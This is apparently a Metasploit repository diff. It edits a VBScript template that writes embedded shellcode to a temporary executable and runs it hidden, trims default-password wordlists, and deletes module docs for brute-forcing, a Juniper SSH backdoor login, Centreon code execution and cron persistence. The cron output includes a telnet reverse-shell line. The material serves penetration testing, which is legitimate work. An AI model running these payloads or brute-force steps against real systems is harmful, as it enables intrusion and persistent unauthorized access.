+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = True
+
+[Obsidium 1.2.0.0 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 3F 1E 00 00
+ep_only = True
+
+[Ste@lth PE 1.01 -> BGCorp]
+signature = ?? ?? ?? ?? ?? BA ?? ?? ?? 00
+ep_only = True
+
+[GCC-Win32 / XMINGW]
+signature = 55 89 e5 83 ec 08 c7 04 24 01 00 00 00
+ep_only = False
+
@@ -1,62 +0,0 @@
-On Error Resume Next
-
-Function WindowsZip(sFile, sZipFile)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oZipShell = CreateObject("WScript.Shell")  
-  Set oZipFSO = CreateObject("Scripting.FileSystemObject")
-  
-  If Not oZipFSO.FileExists(sZipFile) Then
-    NewZip(sZipFile)
-  End If
-
-  Set oZipApp = CreateObject("Shell.Application")
-  
-  sZipFileCount = oZipApp.NameSpace(sZipFile).items.Count
-
-  aFileName = Split(sFile, "\")
-  sFileName = (aFileName(Ubound(aFileName)))
-  
-  'listfiles
-  sDupe = False
-  For Each sFileNameInZip In oZipApp.NameSpace(sZipFile).items
-    If LCase(sFileName) = LCase(sFileNameInZip) Then
-      sDupe = True
-      Exit For
-    End If
-  Next
-  
-  If Not sDupe Then
-    oZipApp.NameSpace(sZipFile).Copyhere sFile
-
-    'Keep script waiting until Compressing is done
-    On Error Resume Next
-    sLoop = 0
-    Do Until sZipFileCount < oZipApp.NameSpace(sZipFile).Items.Count
-      Wscript.Sleep(100)
-      sLoop = sLoop + 1
-    Loop
-    On Error GoTo 0
-  End If
-End Function
-
-Sub NewZip(sNewZip)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oNewZipFSO = CreateObject("Scripting.FileSystemObject")
-  Set oNewZipFile = oNewZipFSO.CreateTextFile(sNewZip)
-    
-  oNewZipFile.Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, 0)
-  
-  oNewZipFile.Close
-  Set oNewZipFSO = Nothing
-
-  Wscript.Sleep(500)
-End Sub
-
@@ -1,31 +1,23 @@
-Function %{var_decodefunc}(%{var_decodebase64})
-	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
-		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
-		%{var_decodebase64} & "</B64DECODE>"
-	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
-	%{var_xmldoc}.LoadXML(%{var_xml})
-	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
-	set %{var_xmldoc} = nothing
-End Function
-
 Function %{var_func}()
-	%{var_shellcode} = "%{base64_shellcode}"
+	%{var_shellcode} = "%{hex_shellcode}"
+
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
 	Dim %{var_tempdir}
+	Dim %{var_tempexe}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
+	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
-	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
-	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
-	%{var_adodbstream}.Type = 1
-	%{var_adodbstream}.Open
-	%{var_adodbstream}.Write %{var_decoded}
-	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 	%{var_shell}.run %{var_tempexe}, 0, true
 	%{var_obj}.DeleteFile(%{var_tempexe})
 	%{var_obj}.DeleteFolder(%{var_basedir})
@@ -4722,4 +4722,3 @@ zxcvbn
 zxcvbnm
 zzzz
 zzzzzz
-vagrant
@@ -1212,4 +1212,3 @@ SQL
 CMOSPWD
 dadmin
 wlcsystem
-vagrant
@@ -16,4 +16,3 @@ xampp
 wampp
 ppmax2011
 turnkey
-vagrant
@@ -8,4 +8,3 @@ wampp xampp
 newuser wampp
 xampp-dav-unsecure ppmax2011 
 admin turnkey
-vagrant vagrant
@@ -11,4 +11,3 @@ sys
 wampp
 newuser
 xampp-dav-unsecure
-vagrant
@@ -88393,4 +88393,3 @@ z
 émigrés
 épée
 étude
-vagrant
@@ -49,4 +49,3 @@ root dbps
 root ibm
 root monitor
 root turnkey
-root vagrant
@@ -4,4 +4,3 @@ role1
 root
 tomcat
 s3cret
-vagrant
@@ -6,4 +6,3 @@ ADMIN ADMIN
 xampp xampp
 tomcat s3cret
 QCC QLogic66
-admin vagrant
@@ -1005,4 +1005,3 @@ raspberry
 arcsight
 MargaretThatcheris110%SEXY
 karaf
-vagrant
@@ -109,4 +109,3 @@ www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -1,23 +0,0 @@
-This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/http/owa_ews_login```
-2. Do: ```set RHOSTS [IP]```
-3. Set TARGETURI if necessary.
-4. Do: ```run```
-
-## Sample Output
-
-```
-msf auxiliary(owa_ews_login) > run
-
-[+] Found NTLM service at /ews/ for domain OWAMSF.
-[+] OWA_EWS - Successful login: Administrator:monkey
-[-] OWA_EWS - Failed login: root:
-[-] OWA_EWS - Failed login: admin:
-[-] OWA_EWS - Failed login: guest:
-[-] OWA_EWS - Failed login: root:root
-[-] OWA_EWS - Failed login: root:password
-[-] OWA_EWS - Failed login: root:1234
-```
@@ -115,12 +115,3 @@ set SMBPass [password]

 Note: If an account has been successfully brute-forced, that account will not be tried again.

-Additionally, if you wish to disable automatic detection of all-access systems, you can change the following option:
-
-**The DETECT_ANY_AUTH option**
-
-This option enables detection of systems accepting any authentication. A bogus login will be attempted.
-
-```
-set DETECT_ANY_AUTH false
-```
@@ -1,33 +0,0 @@
-## Vulnerable Application
-
-  Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
-  
-  A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
-
-  For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
-  4. Do: `set rhosts`
-  5. Do: `run`
-  6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
-
-## Scenarios
-
-  Example run against a Juniper SSG5 with vuln firmware from above link.
-
-```
-msf > use auxiliary/scanner/ssh/juniper_backdoor
-msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
-rhosts => 192.168.1.1
-msf auxiliary(juniper_backdoor) > set verbose true
-verbose => true
-msf auxiliary(juniper_backdoor) > run
-
-[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
@@ -1,242 +0,0 @@
-## Vulnerable Application
-
-  This module is a login bruteforcer against Brocade network device's `enable` feature.
-  
-To configure the device in a vulnerable fashion, follow these steps:
-  1. Set authentication mode via: `aaa authentication enable default local`
-
-This module works against `enable` so we want to ensure telnet itself has no auth
-  **The following should not be set**: `enable telnet authentication`
-  
-This module has been verified against:
-  1. ICX6450-24 SWver 07.4.00bT311
-  2. FastIron WS 624 SWver 07.2.02fT7e1
-
-An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
-
-## Verification Steps
-
-  1. Install the emulator or device
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
-  4. Create/set a password file: `set pass_file /<passwords.lst>`
-  5. If desired: `set user_as_pass true`
-  6. Do: `set rhosts <ip>`
-  7. Do: `run`
-  8. You should get a shell.
-
-## Scenarios
-
-  Example run against ICX6450-24 SWver 07.4.00bT311
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
-rhosts => 192.168.50.1
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[*]  Attempting username gathering from running-config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
-[*] Attempting to start session 192.168.50.1:23 with admin:admin
-[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
-[*] Attempting to start session 192.168.50.1:23 with read:read
-[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
-[*] Attempting to start session 192.168.50.1:23 with port:port
-[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                           Connection
-  --  ----    -----------                           ----------
-  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
-  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
-  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
-
-msf auxiliary(brocade_enable_login) > session -i 1
-[-] Unknown command: session.
-msf auxiliary(brocade_enable_login) > sessions -i 1
-[*] Starting interaction with 1...
-
-show sessions ?
-Unrecognized command
-BR-telnet@FWS624 Router#show ?
-  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
-  aaa                    Show TACACS+ and RADIUS server statistics
-  access-list            show IPv4 access-list information
-  acl-on-arp             Show ARP ACL filtering
-  arp                    Arp table
-  auth-mac-addresses     MAC Authentication status
-  batch                  Batch commands
-  boot-preference        System boot preference
-  buffer-profile         Displays active profile
-  cable-diagnostics      Show Cable Diagnostics
-  chassis                Power supply/fan/temperature
-  clock                  System time and date
-  configuration          Configuration data in startup config file
-  cpu-utilization        CPU utilization rate
-  debug                  Debug information
-  default                System default settings
-  dot1x                  Dot1x information
-  errdisable             Errdisable status
-  fdp                    CDP/FDP information
-  flash                  Flash memory contents
-  gvrp                   GVRP information
-  inline                 inline power information
-  interfaces             Port status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  ip                     IP address setting
-  ipv6                   IP setting
-  license                Show license information
-  link-aggregate         802.3ad Link Aggregation Information
-  link-error-disable     Link Debouncing Control
-  link-keepalive         Link Layer Keepalive
-  lldp                   Link-Layer Discovery Protocol information
-  local-userdb           Local User Database information
-  logging                System log
-  loop-detection         loop detection status & disabled ports
-  mac-address            MAC address table
-  media                  1Gig/10G port media type
-  memory                 System memory usage
-  metro-ring             Metro ring protocol information
-  mirror                 Mirror ports
-  module                 Module type and status
-  monitor                Monitor ports
-  mstp                   show MSTP (IEEE 802.1s) information
-  optic                  Optic Temperature and Power
-  port                   Show port security
-  priority-mapping       802.1Q tagged priority setting
-  processes              Active process statistics
-  protected-link-group   Show Protected Link Group Details
--More--, next page: Space, next line: Return key, quit: Control-c 
-  ptrace                 Global ptrace information
-  qd-buffer-profile      User configured buffer/descriptor profiles
-  qos-profiles           QOS configuration
-  qos-tos                IPv4 ToS based QoS
-  radius                 show radius server debug info
-  rate-limit             Rate-limiting table and actions
-  redundancy             Display management redundancy details
-  relative-utilization   Relative utilization list
-  reload                 Scheduled system reset
-  reserved-vlan-map      Reserved VLAN map status
-  rmon                   Rmon status
-  running-config         Current running-config
-  scheduler-profile      User configured scheduling profiles
-  sflow                  sFlow information
-  snmp                   SNMP statistics
-  sntp                   Show SNTP
-  span                   Spanning tree status
-  statistics             Packet statistics
-  stp-bpdu-guard         BPDU Guard status
-  stp-group              Spanning Tree Group Membership
-  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
-                         counters
-  table-mac-vlan         MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  tech-support           System snap shot for tech support
-  telnet                 Telnet connection
-  topology-group         Topology Group Membership
-  traffic-policy         Show traffic policy definition
-  trunk                  Show trunk status
-  users                  User accounts
-  v6-l4-acl-sessions     Show IPv6 software sessions
-  version                System status
-  vlan                   VLAN status
-  vlan-group             VLAN Group Membership
-  voice-vlan             Show voice vlan
-  vsrp                   Show VSRP commands
-  web-connection         Current web connections
-  webauth                web authentication information
-  who                    User login
-  |                      Output modifiers
-  <cr>
-BR-telnet@FWS624 Router#
-```
-
-  Example run against emulator mentioned above:
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 127.0.0.1
-[*]    Found: username@127.0.0.1
-[*]    Found: ttrogdon@127.0.0.1
-[*]    Found: dmudd@127.0.0.1
-[*]  Attempting username gathering from running-config on 127.0.0.1
-[*]    Found: TopDogUser@127.0.0.1
-[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
-[*] Attempting to start session 127.0.0.1:23 with username:password
-[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
-[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
-[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
-[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
-[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                              Connection
-  --  ----    -----------                              ----------
-  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
-  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
-
-msf auxiliary(brocade_enable_login) >
-```
@@ -1,211 +0,0 @@
-## Vulnerable Application
-
-1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
-2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
-
-### Creating A Testing Environment
-
-Creating a testing environment for this application contained many steps, so I figured I would document the process here.
-
-  1. Create a fresh install of Ubuntu 16.04.  I used a LAMP install. My user was `centreon`
-  2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)
-```
-sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
-sudo add-apt-repository ppa:ondrej/php
-sudo apt-get install php5.6
-sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
-sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
-sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
-  select OK
-  select No Configuration
-sudo apt-get install snmp-mibs-downloader
-```
-  3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`
-```
-a2enmod php5.6
-a2dismod php7.0
-```
-  4. Restart apache with `sudo apache2ctl restart`
-  5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.  The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead
-```
-wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
-tar xvf nagios-plugins-2.1.1.tar.gz
-cd nagios-plugins-2.1.1/
-./configure
-make
-sudo make install
-```
-  5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)
-```
--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
-+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
-@@ -70,8 +70,13 @@
-#endif
-      break;
-   case 3: /* SSLv3 protocol */
-+#if defined(OPENSSL_NO_SSL3)
-+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
-+      return STATE_CRITICAL;
-+#else
-      method = SSLv3_client_method();
-      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
-+#endif
-      break;
-   default: /* Unsupported */
-      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
-```
-  6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-clib
-cd centreon-clib/build
-cmake .
-make
-sudo make install
-```
-  7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-broker
-cd centreon-broker/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)
-```
-cd ~
-git clone https://github.com/centreon/centreon-engine
-cd centreon-engine/build/
-cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
-make
-sudo make install
-```
-  9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.
-```
-sudo mkdir /var/log/centreon-engine
-cd ~
-sudo pear install XML_RPC-1.4.5
-(may need to install php-xml)
-wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
-cd centreon-2.5.3
-sudo ./install.sh -i
-  <enter>
-  q
-  y
-  y
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  <enter>
-  centreon
-  <enter>
-  /var/log/centreon-engine
-  /home/centreon/nagios-plugins-2.1.1/plugins
-  <enter>
-  /etc/init.d/centengine
-  /usr/local/bin/centengine
-  /usr/local/etc/
-  /usr/local/etc/
-  /etc/init.d/centengine
-  <enter>
-  y
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-  <enter>
-  y
-  y
-  <enter>
-  y
-  <enter>
-  <enter>
-  y
-  y
-```
-  10. Fix apache config
-```
-sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
-sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
-sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
-sudo a2enconf centreon
-sudo service apache2 reload
-```
-  11. Configure via website.  Browse to <ip>/centreon
-```
-next
-next
-select centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/bin/centenginestats
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  /usr/local/lib/centreon-engine
-  next
-select centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/cbmod.so
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  /usr/local/lib/centreon-broker
-  next
-Pick whatever details about your user you want, next
-Fill in mysql Root password, next
-next
-next
-finish
-```
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/linux/http/centreon_useralias_exec`
-  4. Do: `set payload`
-  5. Do: `set rhost`
-  6. Do: `check`
-  7. Do: ```run```
-  8. You should get a shell.
-
-## Scenarios
-
-Just a standard run.
-
-    msf > use exploit/linux/http/centreon_useralias_exec
-    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
-    lhost => 192.168.2.229
-    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
-    rhost => 192.168.2.85
-    msf exploit(centreon_useralias_exec) > set verbose true
-    verbose => true
-    msf exploit(centreon_useralias_exec) > check
-    [+] Version Detected: 2.5.3
-    [*] 192.168.2.85:80 The target appears to be vulnerable.
-    msf exploit(centreon_useralias_exec) > exploit
-    [*] Started reverse TCP handler on 192.168.2.229:4444 
-    [*] Sending malicious login
-    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
-    whoami
-    www-data
-    uname -a
-    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
-```
@@ -1,144 +0,0 @@
-### Creating A Testing Environment
-
-This module has been tested against:
-
-1. Kali Rolling
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/cron_persistence`
-  5. Do: `set session #`
-  6. Do: `set target #`
-  7. Do: `set verbose true`
-  8. Optional Do: `set username` (depends on target selection)
-  9. Optional Do: `set cleanup false`
-  10. Do: `exploit`
-
-## Options
-
-  **username**
-
-  Set a specific user's crontab if target 'User Crontab' is selected
-
-  **timing**
-
-  Set cron's timing.  Default is to run within a minute.  If this is changed, WsfDelay should be adjusted to compensate
-
-  **cleanup**
-
-  After the delayed period, use either perl (User/System Crontab) or standard MSF functionality to remove the cron entry.  **THIS WILL STOP THE PERSISTENCE!!!**
-
-## Scenarios
-
-### Kali Rolling (root)
-
-Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 10.10.60.168
-    rhosts => 10.10.60.168
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 10.10.60.168:22 SSH - Starting bruteforce
-    [+] 10.10.60.168:22 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.18.0-kali3-686-pae #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) i686 GNU/Linux '
-    [*] Command shell session 1 opened (10.10.60.168:50618 -> 10.10.60.168:22) at 2016-06-20 09:48:14 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Run our module (Cron)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/cron_persistence
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 0
-    target => 0
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse double handler
-    [*] Max line length is 65537
-    [*] Writing 152 bytes in 1 chunks of 518 bytes (octal-encoded), using printf
-    [+] Writing * * * * * root sh -c '(sleep 3867|telnet 10.10.60.168 4444|while : ; do sh && break; done 2>&1|telnet 10.10.60.168 4444 >/dev/null 2>&1 &)' #bAeBQqUYeb to /etc/cron.d/FiThkldAZR
-    [*] Waiting 90sec for callback
-    [*] Accepted the first client connection...
-    [*] Accepted the second client connection...
-    [*] Command: echo xPBXQvodQdzgByKR;
-    [*] Writing to socket A
-    [*] Writing to socket B
-    [*] Reading from sockets...
-    [*] Reading from socket A
-    [*] A: "xPBXQvodQdzgByKR\r\n"
-    [*] Matching...
-    [*] B is input...
-    [*] Command shell session 2 opened (10.10.60.168:4444 -> 10.10.60.168:45087) at 2016-06-20 13:04:02 -0400
-    [+] Deleted /etc/cron.d/FiThkldAZR
-
-Run our module (System Crontab)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/cron_persistence
-    msf exploit(cron_persistence) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(cron_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 2
-    target => 2
-    msf exploit(cron_persistence) > set cleanup false
-    cleanup => false
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Max line length is 65537
-    [*] Writing 1326 bytes in 1 chunks of 4969 bytes (octal-encoded), using printf
